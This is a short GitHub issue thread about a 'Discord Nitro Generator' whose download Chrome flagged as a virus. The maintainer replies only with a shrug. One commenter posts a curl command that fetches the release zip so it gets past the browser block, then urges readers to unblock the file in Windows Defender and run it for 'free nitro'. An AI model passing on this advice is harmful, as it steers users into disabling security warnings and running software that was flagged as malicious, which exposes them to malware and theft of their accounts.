### ISSUE TITLE
WHY IS THIS A VIRUS CHROME BLOCKED IT BRUH WTF

### ISSUE THREAD

**Issue by NewbieFNF** [Stanley-GF/Discord-Nitro-Generator#17]

**Comment by Stanley-GF** [comment]
¯\_(ツ)_/¯

**Comment by prokube** [comment]
> ¯\_(ツ)_/¯

¯\\\_(ツ)_/¯ fixed :)
you gotta add two more backslashes

`¯\\\_(ツ)_/¯`

**Comment by AqilCont** [comment]
For unblock, just use this command:
```cmd
c:/yourdir> curl https://github.com/Stanley-GF/Discord-Nitro-Generator/releases/download/1.0.0/Discord.Nitro.Generator.V1.zip -L -O
```
in the directory you want the zip file, and it will DL it for you. After that, go into defender settings/the prompt that comes up when you run it and just unblock it :D
free nitro galore pog.
